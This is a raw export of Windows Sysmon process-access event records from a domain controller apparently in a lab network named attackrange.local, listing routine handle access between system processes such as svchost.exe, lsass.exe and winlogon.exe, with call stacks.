13:58:16.071{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.071{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.071{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000009850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000009848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.039{59A5CD1D-8E46-6005-0F00-00000000A301}11162356C:\Windows\System32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\termsrv.dll+a1087|c:\windows\system32\termsrv.dll+6a73d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000009846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.039{59A5CD1D-8E46-6005-1600-00000000A301}15442212C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x147aC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\themeservice.dll+3de3|c:\windows\system32\themeservice.dll+26c0|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.039{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.024{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.024{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.024{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.024{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.024{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.024{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.024{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+396a|c:\windows\system32\SYSNTFY.dll+1fc3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+527f8|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.024{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.024{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 